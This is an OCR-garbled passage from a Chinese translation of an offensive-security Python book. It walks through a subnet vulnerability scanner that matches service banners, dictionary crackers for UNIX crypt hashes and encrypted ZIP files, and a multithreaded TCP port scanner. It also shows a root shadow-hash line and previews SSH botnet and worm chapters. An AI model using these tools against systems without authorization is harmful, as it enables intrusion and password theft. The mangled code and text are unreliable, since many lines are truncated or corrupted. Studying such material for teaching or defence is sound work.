上 一 章 中 ， 你 可 能 会 发 现 我 们 几乎 重复 三 次 写 了 相同 的 代码 ， 来 检测 三 个 不 同 的 IP 
地 址 。 


代替 反复 做 一 件 事 ， 使 用 for 循环 便利 多 个 元 素 会 更 加 容易 。 举 个 例子 : WRK 
们 想 便利 整个 整个 IP 地 址 从 192.168.98.1 到 192.168.95.254 的 子 网 ， 我 们 要 
用 一 个 for 循环 从 1 到 255 进 行 遍历 ， 来 打印 出 子 网 内 的 信息 。 


>>> for x in range(1, 255): 
print "192.168.95."+str(x) 


1922168295. 
192.168.95. 
192.168.95. 
192 .168 .95 ， 
192 .168 .95 , 
192.168.95. 
... <SNIPPED> ... 
192 .168.95.253 

192 .168.95.254 


OODP 


同样 ， 我 们 可 能 需要 遍历 已 知 的 端口 列表 来 检查 漏洞 。 代 替 一 系列 的 数字 ， 我 们 可 
以 通过 一 个 元 素 列 表 遍 历 他 们 。 


>>> portList = [21,22,25,80,110] 
>>> for port in portList: 
print port 
21 
22 
25 


80 
110 


RETA for 循环 ， 现 在 我 们 可 以 打印 出 每 个 IP 地 址 和 端口 了 。 


>>> for x in range(1, 255): 
for port in portList: 
print "[+] Checking 192.168.95."\ 


+str(x)+": “+Str( port ) 
[+] Checking 192.168.95.1:21 
[+] Checking 192.168.95.1:22 
[+] Checking 192.168.95.1:25 
[+] Checking 192.168.95.1:80 
[+] Checking 192.168.95.1:110 
[+] Checking 192.168.95.2:21 
[+] Checking 192.168.95.2:22 
[+] Checking 192.168.95.2:25 
[+] Checking 192.168.95.2:80 
[+] Checking 192.168.95.2:110 


Sa) ONEPPED > 


随 着 程序 有 了 遍历 IP 和 端口 的 能 力 ， 我 们 也 将 个 更 新 我 们 的 漏洞 检测 脚本 ， 现 在 ， 
我 们 的 脚本 将 测试 全 部 254 个 IP 地 址 所 提供 的 telnet, SSH, smtp, http,imap, and 


https 服 务 。 


import socket 
def retBanner(ip, port): 


try: 


socket.setdefaulttimeout (2) 
s = socket.socket() 
s.connect((ip, port)) 
banner = s.recv(1024) 
return banner 


except: 


return 


def checkVulns(banner): 


if 


'FreeFloat Ftp Server (Version 1.00)' in banner: 


print '[+] FreeFloat FTP Server is vulnerable. ' 


elif '3Com 3CDaemon FTP Server Version 2.0' in banner: 


print '[+] 3CDaemon FTP Server is vulnerable. ' 


elif 'Ability Server 2.34' in banner: 


print '[+] Ability FTP Server is vulnerable. ' 


elif 'Sami FTP Server 2.0.2' in banner: 


print '[+] Sami FTP Server is vulnerable. ' 


else: 


print '[-] FTP Server is not vulnerable. ' 


return 
def main(): 
portList = [21,22,25,80,110, 443] 


for x in range(1, 255): 
ip = '192.168.95.' + str(x) 
for port in portList: 
banner = retBanner(ip, port) 


if banner: 
print '[+] ' + ip + ': ' + banner 
checkVulns (banner ) 
if _name__ == '_main_!': 


main() 


文件 1O 


虽然 我 们 的 脚本 已 有 了 一 些 能 帮助 检测 漏洞 信息 的 计 语 名， 但 加 进 一 个 漏洞 列表 会 
更 好 ， 举 个 例子 ， 假 设 我 们 有 一 个 叫做 vuln_banners.txt 的 文本 文件 。 在 每 一 
行 该 文件 列 出 了 具体 的 服务 版 本 和 已 知 的 之 前 的 漏洞 ， 我 们 不 Ve 
if 语 句 ， 让 我 们 读 取 这 个 文本 文件 ， 并 用 他 来 判断 是 否 我 们 的 提示 信息 存在 汤 洞 。 


programmer$ cat vuln_banners.txt 

3Com 3CDaemon FTP Server Version 2.0 
Ability Server 2.34 

CCProxy Telnet Service Ready 

ESMTP TABS Mail Server for Windows NT 
FreeFloat Ftp Server (Version 1.00) 
IMAP4revi MDaemon 9.6.4 ready 
MailEnable Service, Version: 0-1.54 
NetDecision-HTTP-Server 1.0 

PSO Proxy 0.9 

SAMBAR 

Sami FTP Server 2.0.2 

Spipe 1.0 

TelSrv 1.5 

WDaemon 6.8.5 

WinGate 6.1.1 

Xitami 

YahooPOPs! Simple Mail Transfer Service Ready 


我 们 将 会 把 我 们 更 新 后 的 代码 放 到 函数 checkvulns() 中 。 在 这 里 我 们 将 用 只 读 
模式 ( 'r' ) 打 开 文 本 文件 。 然 后 使 用 函数 readlines() 遍历 文件 的 每 一 行 ， 对 每 
一 行 ， 我 们 把 他 与 我 们 的 提示 信息 作 比 较 ， 注 意 我 们 必须 用 方 

法 .strip(‘\r’) 去 掉 每 行 的 回 车 符 ， 如 果 发 现 一 对 匹配 了 ， 我 们 打印 出 有 漏洞 
的 服务 信息 。 


def checkVulns(banner): 
f = open("vuln_banners.txt", 'r') 
for line in f.readlines(): 
if line.strip('\n') in banner: 
print "[+] Server is vulnerable: "+banner.strip('\n' ) 


[ER 


SYS 模块 


内 置 的 sys 模块 提供 访问 和 维护 python 解 释 器 的 能 力 。 这 包括 了 提示 信息 ， 版 本 ， 
整数 的 最 大 值 ， 可 用 模块 ， 路 径 钓 子 ， 标 准 错误 ， 标 准 输入 输出 的 定位 和 解释 器 调 
用 的 命令 行 参数 。 你 能 够 在 python 的 在 线 模块 文档 上 找到 更 多 与 此 相关 的 信息 ( 
http://docs.python.org/library/sys ) 。 在 创建 python 脚 本 时 与 Sys 模块 交互 会 十 分 有 
用 。 我 们 可 以 ， 例 如 ， 想 在 程序 运行 时 解析 命令 行 参数 。 


思考 下 我 们 的 漏洞 扫描 器 ， 如 果 我 们 想 要 把 文本 文件 的 名 字 作 为 命令 行 参 数 传递 会 
EAR ? 领 标 sys,argv 包含 了 全 部 的 命令 含 参 数 。 第 一 个 索 

5] sys.argv[0] 包含 了 python 脚 本 解释 器 的 名 称 。 列 表 中 剩余 的 元 素 包 含 了 以 下 
全 部 的 命令 行 参数 。 因 此 ， 如 果 我 们 只 想 传递 附加 的 参数 ， sys,argv 应 该 包含 两 
个 元 素 。 


import sys 
if len(sys.argv)==2: 
filename = sys.argv[1] 
print "[+] Reading Vulnerabilities From: "+filename 


运行 我 们 的 代码 片段 ， 我 们 看 到 代码 成 功 的 解析 了 命令 行 参 数 并 把 他 打印 到 了 屏幕 
上 。 你 可 以 花 时 间 来 学 习 下 全 部 的 Sys 模 块 提供 给 程序 设计 师 的 丰富 的 功能 。 


programmer$ python vuln-scanner.py vuln-banners.txt 
[+] Reading Vulnerabilities From: vuln-banners.txt 


OS 模块 


内 置 的 OS 模块 提供 了 丰富 的 与 MAC,NT,Posix 等 操作 系统 进行 交互 的 能 力 。 这 个 模 
块 允许 程序 独立 的 与 操作 系统 环境 。 文 件 系 统 ， 用 户 数据 库 和 权限 进行 交互 。 思 考 
一 下 ， 比 如 ， 上 一 章 中 ， 用 户 把 文件 名 作为 命令 行 参数 来 传递 。 他 可 以 验证 文件 是 
否 存 在 以 及 当前 用 户 是 否 有 权限 都 这 个 文件 。 如 果 失 败 ， 他 将 显示 一 条 信息 ， 来 显 
示 一 个 适当 的 错误 信息 给 用 户 。 


import sys 
import os 
if len(sys.argv) == 2: 
filename = sys.argv[1] 
if not os.path.isfile(filename): 
print '[-] ' + filename + ' does not exist.' 
exit(0) 
if not os.access(filename, os.R_OK): 
print '[-] ' + filename + ' access denied. ' 
exit (0) 
print '[+] Reading Vulnerabilities From: ' + filename 


为 了 验证 我 们 的 代码 ， 我 们 尝试 读 取 一 个 不 存在 的 文件 ， 该 文件 使 我 们 的 程序 打印 
出 了 错误 信息 ， 接 下 来 ， 我 们 创建 这 个 文件 ， 我 们 的 脚本 成 功 的 读 取 了 他 。 最 后 我 
们 限制 了 权限 ， 我 们 的 脚本 正确 的 打印 了 拒绝 访问 的 消息 。 


programmer$ python test.py vuln-banners.txt 

[-] vuln-banners.txt does not exist. 

programmer$ touch vuln-banners.txt 

programmer$ python test.py vuln-banners.txt 

[+] Reading Vulnerabilities From: vuln-banners.txt 
programmer$ chmod 000 vuln-banners.txt 

programmer$ python test.py vuln-banners.txt 

[-] vuln-banners.txt access denied 


现在 我 们 可 以 重新 组 合 漏洞 扫描 程序 的 各 个 
行 时 缺少 使 用 线程 的 能 力 或 是 更 好 的 分 析 命 
续 改进 这 个 脚本 


Import socket 
import os 
import sys 
def retBanner(ip, port): 
try: 
socket.setdefaulttimeout (2) 
s = socket.socket() 
s.connect((ip, port)) 
banner = s.recv(1024) 
return banner 
except: 
return 
def checkVulns(banner, filename): 
f = open(filename, 'r') 
for line in f.readlines(): 
if line.strip('\n') in banner: 
print '[+] Server is vulnerable: ' +\ 
banner.strip('\n') 
def main(): 
if len(sys.argv) == 
filename = sys.argv[1] 
if not os.path.isfile(filename): 
print '[-] ' + filename +\ 
' does not exist. ' 
exit(0) 
if not os.access(filename, os.R_OK): 
print '[-] ' + filename +\ 
' access denied. ' 
exit(0) 
else: 
print '[-] Usage: ' + str(sys.argv[0]) +\ 
' <vuln filename>' 
exit(0) 
portList = [21,22,25,80,110, 443] 
for x in range(147, 150): 
ip = '192.168.95.' + str(x) 
for port in portList: 
banner = retBanner(ip, port) 


if banner: 
print '[+t] + ip+ ': "+ banner 
checkVulns(banner, filename) 
if _name == ' main_': 
main() 


你 的 的 第 一 个 Python 程 序 


零件 。 不 用 担心 他 会 错误 终止 或 是 在 执 
令 行 的 能 力 ， 我 们 将 会 在 后 面 的 章节 继 


随 着 了 解 了 如 何 构 建 python 脚 本 ， 让 我 们 开始 写 我 们 的 第 一 个 程序 。 在 我 们 向 前 返 
进 前 ， 我 们 将 描述 一 些 轶 闻 轶 事 ， 强 调 我 们 的 脚本 的 需要 。 


为 你 的 第 一 个 程序 设立 个 平台 : 


杜鹃 看 的 故事 


C. Stoll 的 《 杜 胸 蛋 》(1989) 堪 称 新 派 武侠 的 开山 之 作 。 它 第 一 次 把 黑客 活动 与 国家 
安全 联系 在 一 起 。 黑 客 极 具 破坏 性 的 黑暗 面 也 浮 出 海面 ， 并 且 永 远 改 变 了 黑客 的 形 
象 。 迄 今 仍 是 经 久 不 衰 的 畅销 书 。Stoll 是 劳伦斯 伯克利 实验 室 的 天 文学 家 和 系统 管 
理 员 。1986 年 夏 ， 一 个 区 区 75 美 分 的 帐 目 错误 引起 了 他 的 警觉 ， 在 追查 这 次 未 经 授 
权 的 入 侵 过 程 中 ， 他 开始 卷 入 一 个 错综复杂 的 电脑 间谍 案 。 神 秘 的 入 侵 者 是 西 德 混 
沌 俱乐部 的 成 员 。 他 们 潜入 美国 ， 窃 取 敏 感 的 军事 和 安全 情报 。 出 售 给 克格勃 ， 以 
换取 现金 及 可 卡 因 。 一 场 网 络 跨国 大 搜索 开始 了 ， 并 牵涉 出 FBI、CIA、 克 格 勃 、 西 
德 邮 电 部 等 。《 杜 胸 蛋 》 为 后 来 的 黑客 作品 商定 了 一 个 主题 : 追捕 与 反 追 捕 的 惊险 
故事 。 而 且 也 开始 了 新 模式 : 一 个 坚韧 和 智慧 的 孤胆 英雄 ， 成 为 国家 安全 力量 的 化 
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该 故事 已 经 有 经 典 的 翻译 版 本 ， 可 以 直接 参考 


下 载 地 址 : http://pan.baidu.com/s/1kKTCNWMF 密码 ug42 


你 的 第 一 个 程序 ， 一 个 UNIX 密 码 破解 器 | 


我 们 只 需要 用 标准 库 中 的 crypt 模块 的 crypt() 函数 。 传 入 密码 和 盐 即 可 。 让 
我 们 赶快 试 一 试用 crypt() 郊 数 哈 希 一 个 密码 试 试 ， 我 们 输入 密码 "egg" 和 
盐 "HX" ， 返 回 的 哈 希 密码 值 是 "HX9LLTdc/jiDE" ， 现 在 我 们 可 以 遍历 整个 字 
典 ， 试 图 用 常用 的 盐 来 匹配 破解 哈 希 密码 |! 


>>>import crypt 
>>>crypt.crypt(‘egg’, ‘HX’) 
“HX9LLTdc/jiDE” 


注意 : 哈 希 密码 的 前 两 位 就 是 盐 的 前 两 位 ， 这 里 我 们 假设 盐 只 有 两 位 。 
程序 分 两 部 分 ， 一 部 分 是 打开 字典 ， 另 一 部 分 是 哈 希 匹配 密码 ， 


代码 如 下 : 


# coding=UTF-8 


暴力 破解 UNIX 的 密码 ， 需 要 输入 字典 文件 和 UNIX 的 密码 文件 
import crypt 
def testPass(cryptPass): 
salt = cryptPass[0:2] 
dictfile = open('dictionary.txt', 'r') # 打 开 字 典 文件 
for word in dictfile.readlines(): 
word = word.strip('\n') # 保 留 原 始 的 字符 ， 不 去 空格 
cryptword = crypt.crypt(word, salt) 
if cryptPass == cryptWord: 


print('Found passed : ', word) 
return 
print('Password not found !') 
return 


def main(): 
passfile = open('passwords.txt', 'r') # 读 取 密 码 文件 
for line in passfile.readlines(): 
user = line.split(':')[0] 
cryptPass = line.split(':')[1].strip('') 
print("Cracking Password For :", user) 


testPass(cryptPass) 
if _name__ == '__main_': 
main() 


但 是 现代 的 xNIX 系 统 将 密码 存储 在 /etc/shadow 文件 中 ， ， 提供 了 个 更 安全 的 哈 希 
散 列 和 工法 SHA-512 算 法 ，Python 的 标准 库 中 hashlib 模块 提供 了 此 算法 ， 我 们 可 
以 更 新 我 们 的 脚本 ， 破 解 SHA-512 哈 希 散 列 加 密 算 法 的 密码 。 


root@DJ-PC:/home/dj# cat /etc/shadow | grep root 
root: $6$tOdy7TXs$mJxj1Ydfx83EgOb7ryietUQA8g7GliedT2D1n1LhiEunizJ1A/ 


[E 





你 的 第 二 个 程序 : ZIP 文 件 密码 破解 
Python 的 标准 库 提 供 了 ZIP 文 件 的 提取 压缩 模块 zipfile ， 现 在 让 我 们 试 着 用 这 
个 模块 ， 暴 力 破解 出 加 密 的 ZIP 文 件 ! 


我 们 可 以 用 extractall() 这 个 函数 抽取 文件 ， 密 码 正确 则 返回 正确 ， 密 码 错 误 
测 抛 出 异常 。 


现在 我 们 可 以 增加 一 些 功能 ， 将 上 面 的 单线 程 程序 变 成 多 线程 的 程序 ， 来 提高 破解 


两 个 程序 代码 如 下 ， 注 释 处 为 单线 程 代码 : 


# coding=UTF-8 


用 字典 暴力 破解 ZIP 压 缩 文件 密码 
import zipfile 

import threading 

def extractFile(zFile, password): 


try: 
zFile.extractall(pwd=password) 
print("Found Passwd : ", password) 
return password 
except: 
pass 
def main(): 


zFile = zipfile.ZipFile('unzip.zip') 
passFile = open('dictionary.txt') 
for line in passFile.readlines(): 
password = line.strip('\n') 
t = threading.Thread(target=extractFile, args=(zFile, passv 
t.start() 
guess = extractFile(zFile, password) 
if guess: 
print('Password = ', password) 
return 
else: 
print("can't find password") 
return 


if name == '_main_': 
main() 





现在 ， 我 们 想 用 户 可 以 指定 要 破解 的 文件 和 字典 ， 我 们 需要 借助 Python 标准 库 中 
的 optparse 模块 来 指定 参数 ， 有 具体 的 讲解 将 在 下 一 章 讲解 ， 这 里 我 们 只 提供 本 例 
的 代码 : 


# coding=UTF-8 


ZIP 压 缩 文 件 破解 程序 加 强 版 ， 用 户 可 以 自己 指定 想 要 破解 的 文件 和 破解 字典 ， 多 线程 破解 
import zipfile 

import threading 

import optparse 

def extractFile(zFile, password): 


try: 
zFile.extractall(pwd=password) 
print("Found Passwd : ", password) 
except: 
pass 
def main(): 


parser = optparse.OptionParser('usage%prog -f &lt;zipfile&gt; 
parser.add_option('-f', dest='zname', type='string', help='spec 
parser.add_option('-d', dest='dname', type='string', help='spec 
options, args = parser.parse_args() 


if options.zname == None | options.dname == None: 
print(parser.usage) 
exit(0) 

else: 


Zname = options.zname 
dname = options.dname 

zFile = zipfile.ZipFile(zname) 

dFile = open(dname, 'r') 

for line in dFile.readlines(): 
password = line.strip('\n') 
t = threading. Thread(target=extractFile, args=(zFile, passv 
t.start() 

if _name == '_ main_': 
main() 
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本 章 我 们 就 认识 了 Python 的 基本 用 法 ， 写 了 一 个 UNIX 的 密码 破解 器 和 ZIP 文 件 密码 
破解 器 ， 下 一 章 我 们 将 用 Python 做 进一步 的 渗透 测试 ! 


第 二 章 用 python 进 行 渗透 测试 


本 章 内 容 : 


. 构建 一 个 端口 扫描 器 

. 构建 一 个 SSH 的 僵尸 网 络 

. 通过 FTP 和 连接 WEB 来 渗透 

. 复制 Conficker 蠕 于 

. 写 你 的 第 一 个 0day 利 用 代码 

做 一 个 战士 不 是 一 件 简单 的 事 。 这 是 一 场 无 休止 的 、 会 持续 到 我 们 生命 最 后 一 
刻 的 和 斗争。 没有 人 生 下 来 就 是 战士 ， 就 像 没 人 生 下 来 就 注定 庸 克 , 是 我 们 让 自 
己 变 成 这 样 或 者 那样 ! 


一 Kokoro by Natsume Sosek (2 Hik Æ ) , 1914, Japan (日 本 ) 
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引文 : Morrist® 2 4 = 如 今 仍 然 会 有 效果 人 么 ? 


在 StuxNet 蠕 虫 病毒 瘫痪 了 伊朗 在 Bushehr 和 Natantz (地 名 ) 的 核 动力 的 22 年 前 ， 
一 个 康 奈 尔 大 学 的 研究 生 推出 了 第 一 款 “ 数 字 炸 药 ”。Robert Tappen Morris Jr ( 
伯 特 。 英 里 斯 ) ， 国 家 安全 局 国家 计算 机 安全 中 心 的 负责 人 的 儿子 ， 用 一 种 被 巧妙 地 
称 为 Morris 蠕 虫 的 病毒 感染 了 6000 个 工作 站 。6000 个 工作 站 在 今天 的 标准 下 似乎 微 
不 足 道 ， 但 在 1988 年 ， 这 个 数字 代表 了 当时 互联 网 上 所 有 计算 机 的 百 分 之 十 。 为 了 
消除 莫 里 斯 的 蠕虫 病毒 留 下 的 伤害 ， 美 国政 府 问 责 局 提出 了 100000000 美 元 以 上 的 
预算 。 那 么 这 种 蠕虫 病毒 是 如 何 工 作 的 呢 ? 


英里 斯 的 蠕虫 病毒 使 用 了 三 管 齐 下 的 攻击 方式 来 破坏 系统 。 它 首先 利用 了 UNIX 的 
sendmail 程 序 的 漏洞 。 其 次 ， 他 利用 了 Unix 系统 守护 进程 功能 的 一 个 用 以 分 离 的 漏 
洞 。 最 后 ， 他 会 用 一 些 常 见 的 用 户 名 和 密码 ， 试 图 连接 到 使 用 远程 shell 的 目标 

(RSH) 。 如 果 这 三 次 攻击 成 功 执行 ， 蠕 虫 会 用 一 个 小 的 程序 ， 像 钩子 一 样 把 病毒 
(Eichin & Rochlis, 1989) 的 剩余 部 分 拉 过 来 。 


与 此 相似 的 攻击 如 今 仍然 会 有 效果 么 ? 我们 能 学 习 写 出 几乎 相同 的 一 些 东 西 么 ? 这 
些 问题 为 本 章 剩余 要 讲解 的 部 分 提供 了 基础 。 英 里 斯 用 C 语 言 编写 了 他 的 大 部 分 攻 
击 软 件 。 然 后 ，C 语 言 是 一 个 非常 强大 的 语言 ， 学 习 他 也 是 有 挑战 性 的 。 与 此 形成 
鲜明 对 比 的 是 ，python 语 言 具 有 多 于 掌握 的 语法 和 丰富 的 第 三 方 模块 。 这 提供 了 一 
个 更 好 的 平台 支持 ， 并 且 让 大 多 数 开 发 者 能 相当 容易 的 发 起 攻击 。 在 接 下 来 的 内 容 
中 ， 我 们 将 使 用 python 来 重新 构建 英里 斯 蠕虫 的 部 分 代码 。 





构建 一 个 端口 扫 瞄 器 


侦查 是 任何 网 络 攻 击 的 第 一 步 。 在 选择 目标 的 漏洞 利用 程序 之 前 攻击 者 必须 找 出 漏 
洞 在 哪 。 在 下 面 的 章节 中 ， 我 们 将 建立 一 个 小 型 的 侦查 脚本 用 来 扫描 目标 主机 开放 
的 TCP 端 口 。 然 而 ， 为 了 与 TCP 端 口 进行 交互 ， 我 们 需要 先 建 立 TCP 套 接 字 。 


Python， 像 大 多 数 现 代 编程 语言 一 样 ， 提 供 了 访问 BCD 套 接 字 的 接口 。BCD 套 接 字 
提供 了 一 个 应 用 程序 编程 接口 ， 允 许 程序 员 编 写 应 用 程序 用 以 执行 主机 之 间 的 网 络 
通讯 。 通 过 一 系列 的 socket APIKA > RMT AAE o RE’ EN’ RRRA 
送 流 量 在 TCP/IP 套 接 字 上 。 在 这 一 点 上 ， 更 好 的 理解 TCP/IP 和 socket 是 为 了 者 
助 我 们 更 加 进一步 的 发 展 我 们 自己 的 攻击 。 


大 多 数 的 Internet 访 问 程序 是 在 TCP 之 上 的 。 例 如 ， 一 个 目标 组 织 ，Web 服 务 可 能 
运行 在 TCP 的 80 端 口 之 上 ， 邮 件 服务 可 能 运行 在 TCP 的 25 端 口 之 上 ， 文 件 传 输 服 务 
可 能 运行 在 TCP 的 21 端 口 之 上 。 为 了 连接 目标 组 织 的 这 些 服 务 ， 攻 击 者 必须 知道 
Internet 协 议 的 地 址 和 与 服务 相关 的 TCP 端 口 。 对 目标 组 织 熟 悉 的 人 可 能 有 这 些 信 
息 ， 但 攻击 者 可 能 没有 。 攻击 者 经 常 以 端口 扫描 拉 开 一 次 成 功 渗透 攻 击 的 序幕 。 一 
种 类 型 的 端口 扫描 就 是 发 送 一 个 TCP SYN 包 里 面包 含 了 一 系列 的 常用 的 端口 并 等 待 
TCP ACK 响 应 ， 从 而 判断 端口 是 否 开 放 。 相 比 之 下 ， 也 可 以 用 一 个 全 握手 协议 的 
TCP 连 接 扫描 来 确定 服务 或 者 端口 的 可 用 性 。 


TCP 全 连接 扫描 


让 我 们 开始 编写 我 们 自己 的 TCP 端 口 扫 瞄 器 ， 利 用 TCP 全 连接 扫描 来 识别 主机 。 首 
先 ， 我 们 要 导入 Python 的 BCD 套 接 字 API 模 块 socket 。 socket API 提 供 了 一 系 
列 的 汶 数 将 用 来 实现 我 们 的 TCP 端 口 扫描 。 为 了 深入 了 解 ， 请 查看 Python 的 标准 库 
文档 ， 地 址 : http://docs.Python.org/library/socket.html ° 


socket.gethostbyname(hostname) : 这 个 函数 将 主机 名 换 换 为 ITP 地 址 ， 如 
socket.gethostbyaddr(ip_address) : 这 个 函数 传 入 一 个 IP 地 址 将 返回 一 个 元 组 ， 
socket.socket([family[, type[, proto]]]) :这 个 函数 将 产生 一 个 新 的 Sockel 


socket.create_connection(address[, timeout[, source_address]] :这 个 


‘| 


为 了 更 好 的 理解 我 们 的 TCP 端 口 扫 瞄 器 的 工作 原理 ， 我 们 将 脚本 分 为 五 个 步骤 ， 一 
步 一 步 的 写 出 每 个 步骤 的 代码 。 第 一 步 ， 我们 要 输入 目标 主机 名 和 要 扫描 的 常用 端 
口 列表 。 接 着 ， 我 们 将 通过 目标 主机 名 得 到 目标 的 网 络 IP 地 址 。 我 们 将 用 列表 里 面 
的 每 一 个 端口 去 连接 目标 地 址 ， 最 后 确定 端口 上 运行 的 特殊 服务 。 我 们 将 发 送 特定 
的 数据 ， 并 读 取 特 定 应 用 程序 返回 的 标识 。 


在 我 们 的 第 一 步 中 ， 我 们 从 用 户 那 接受 主机 名 和 端口 。 因 此 我 们 的 程序 将 利 

用 optparse 标准 库 来 解析 命令 行 选项 ， 调 用 optparse.OptionParser() 创建 
一 个 选项 分 析 器 ， 然 后 通过 parser.add_option() 函数 来 指定 命令 选项 。 

(È: optparse 模块 在 2.7 版 本 后 将 被 弃 用 也 不 会 得 到 更 新 ， 会 使 

用 argparse 模块 来 替代 ) 下 面 的 例子 显示 了 一 个 快速 解析 目标 主机 和 扫描 端口 的 
方法 。 





# coding=UTF-8 
import optparse 
parser = optparse.OptionParser('usage %prog -H <target host> -p <té 
parser.add_option('-H', dest='tgtHost', type='string', help='specili 
parser.add_option('-p', dest='tgtPort', type='int', help='specify 1 
(options, args) = parser.parse_args() 
tgtHost = options.tgtHost 
tgtPort = options.tgtPort 
if (tgtHost == None) | (tgtPort == None): 
print(parser.usage) 
exit (0) 
else: 
print(tgtHost ) 
print(tgtPort) 


LE 


接 下 来 ， 我 们 将 构建 两 个 函数 connScan 和 portScan , portScan 函数 需要 主机 
名 和 端口 作为 参数 。 它 首先 尝试 通过 gethostbyname() 函数 从 友好 的 主机 名 中 解 
析出 主机 |IP 地 址 。 接 下 来 ， 它 将 打印 出 主机 名 或 者 IP 地址 ， 然 后 枚 举 每 一 个 端口 尝 
试 着 用 connScan 函数 去 连接 主机 。 connScan 函数 需要 两 个 参数 : tgtHost 
和 tgtPort ， 并 尝试 产生 一 个 到 目标 主机 端口 的 连接 。 如 果 成 功 的 

话 ，connScan 将 打印 端口 开放 的 信息 ， 如 果 失 败 的 话 ， 将 打印 端口 关闭 的 信息 。 





# coding=UTF-8 
import optparse 
import socket 


def connScan(tgtHost, tgtPort): 

try: 
connSkt = socket.socket(socket.AF_INET, socket .SOCK_STREAM 
connSkt.connect((tgtHost, tgtPort)) 
print('[+]%d/tcp open' % tgtPort) 
connSkt.close( ) 

except: 
print('[-]%d/tcp closed' % tgtPort) 


def portScan(tgtHost, tgtPorts): 


try: 
tgtIP = socket.gethostbyname(tgtHost ) 

except: 
print("[-] Cannot resolve '%s': Unknown host" % tgtHost) 
return 

try: 


tgtName = socket.gethostbyaddr(tgtIP) 
print('\n[+] Scan Results for: ' + tgtName[0] ) 
except: 
print('\n[+] Scan Results for: ' + tgtIP) 
socket.setdefaulttimeout (1) 
for tgtPort in tgtPorts: 
print('Scanning port ' + str(tgtPort)) 
connScan(tgtHost, int(tgtPort) ) 
# 测 试 是 否 有 效 
portScan('www.baidu.com', [80, 443, 3389,1433,23,445]) 
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捕获 应 用 标识 


为 了 从 捕获 我 们 的 目标 主机 的 应 用 标识 ， 我 们 必须 首先 插入 额外 的 验证 代码 

到 connScan 函数 中 。 一 旦 发 现 开 放 的 端口 ， 我 们 发 送 一 个 字符 串 数 据 到 这 个 端口 
然后 等 待 响应 。 收 集 这 些 响 应 并 推断 可 能 会 得 到 运行 在 目标 主机 端口 上 的 应 用 程序 
的 一 些 信息 。 


# coding=UTF-8 
import optparse 
import socket 


def connScan(tgtHost, tgtPort): 

try: 
connSkt = socket.socket(socket.AF_INET, socket .SOCK_STREAM 
connSkt.connect((tgtHost, tgtPort) ) 
connSkt.send('ViolentPython\r\n' ) 
results = connSkt.recv(100) 
print('[+]%d/tcp open' % tgtPort) 
print('[+] ' + str(results)) 
connSkt.close() 

except: 
print('[-]%d/tcp closed' % tgtPort) 


def portScan(tgtHost, tgtPorts): 


try: 
tgtIP = socket.gethostbyname(tgtHost ) 

except: 
print "[-] Cannot resolve '%s': Unknown host" %tgtHost 
return 

try: 


tgtName = socket.gethostbyaddr(tgtIP) 
print('\n[+] Scan Results for: ' + tgtName[0] ) 
except: 
print('\n[+] Scan Results for: ' + tgtIP) 
socket.setdefaulttimeout (1) 
for tgtPort in tgtPorts: 
print('Scanning port ' + str(tgtPort)) 
connScan(tgtHost, int(tgtPort) ) 


def main(): 
parser = optparse.OptionParser('usage %prog -H <target host> -| 
parser.add_option('-H', dest='tgtHost', type='string', help='sy 
parser.add_option('-p', dest='tgtPort', type='int', help='spec: 
(options, args) = parser.parse_args() 
tgtHost = options.tgtHost 
tgtPort = options.tgtPort 
args.append(tgtPort) 
if (tgtHost == None) | (tgtPort == None): 
print('[-] You must specify a target host and port[s]!') 


exit (0) 
portScan(tgtHost, args) 
if _ name == '_ main_': 
main() 





例如 说 ， 扫 描 一 个 站 点 ， 以 下 是 扫描 获得 的 信息 : 


attacker$ python portscanner.py -H 192.168.1.37 -p 21, 22, 80 
[+] Scan Results for: 192.168.1.37 

Scanning port 21 

[+] 21/tcp open 

[+] 220 FreeFloat Ftp Server (Version 1.00). 


可 以 看 到 目标 主机 的 开放 端口 和 相应 的 服务 版 本 ， 再 以 后 的 入 侵 中 将 会 用 到 这 些 信 


多 线程 扫描 


因为 每 一 个 socket 都 有 时 间 延 迟 ， 每 一 个 socket 扫描 都 将 会 耗 时 几 秒 钟 ， 虽 
然 看 起 来 无 足 轻 重 ， 但 是 如 果 我 们 扫描 多 个 端口 和 主机 延迟 时 间 将 迅速 增 大 。 理 想 
情况 下 ， 我 们 希望 这 些 socket 按 顺序 扫描 。 引 入 Python 线程 。 线 程 提 供 了 一 种 同 
时 执行 的 方式 。 在 我 们 的 扫描 中 利用 线程 ， 只 需 将 portScan() 元 数 的 迭代 改 一 
下 。 请 注意 ， 我 们 可 以 把 每 一 个 connScan() 函数 都 当做 是 一 个 线程 。 在 迭代 的 
过 程 中 产生 的 每 一 个 线程 将 在 同时 执行 。 


for tgtPort in tgtPorts: 
print('Scanning port ' + str(tgtPort)) 
t = threading. Thread(target=connScan, args=(tgtHost, int(t¢ 
t.start() 
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数 connScan() 打印 在 屏幕 上 的 内 容 时 如 果 多 线程 在 同一 时 刻 打印 的 话 可 能 会 出 
现 乱 序 。 为 了 让 函数 完整 正确 的 输出 信息 ， 我 们 就 使 用 信号 量 。 一 个 简单 的 信号 量 
为 我 们 提供 了 一 个 锁 来 阻止 其 他 线程 进入 。 


注意 在 打印 输出 之 前 ， 我 们 抢占 一 个 锁 使 用 screenLock.acquire() 来 加 锁 。 如 
果 锁 打开 ， 信 号 量 将 允许 线程 继续 运行 然后 打印 输出 ， 如 果 锁 定 ， 我 们 将 要 等 到 控 
制 信号 量 的 进程 释放 锁 。 利 用 信号 量 ， 我 们 可 以 保证 在 任何 个 定 的 时 间 只 有 一 个 线 
程 在 打印 屏幕 输出 。 在 我 们 的 异常 处 理 代码 中 ， 在 结束 之 前 将 结束 下 面 的 代码 快 。 





screenLock = threading.Semaphore(value=1) 
def connScan(tgtHost, tgtPort): 
try: 
connSkt = socket.socket(socket.AF_INET, socket .SOCK_STREAM 
connSkt.connect((tgtHost, tgtPort) ) 
connSkt.send('ViolentPython\r\n' ) 
results = connSkt.recv(100) 
screenLock.acquire() 
print('[+]%d/tcp open' % tgtPort) 
print('[+] ' + str(results)) 
except: 
screenLock.acquire() 
print('[-]%d/tcp closed' % tgtPort) 
finally: 
screenLock.release() 
connSkt.close( ) 


a 
将 所 有 的 功能 组 合 在 一 起 ， 我 们 将 产生 我 们 最 终 的 端口 反面 器 脚本 。 





# coding=UTF-8 
import optparse 
import socket 
import threading 


screenLock = threading.Semaphore(value=1) 
def connScan(tgtHost, tgtPort): 
try: 
connSkt = socket.socket(socket.AF_INET, socket .SOCK_STREAM 
connSkt.connect((tgtHost, tgtPort) ) 
connSkt.send('ViolentPython\r\n' ) 
results = connSkt.recv(100) 
screenLock.acquire() 
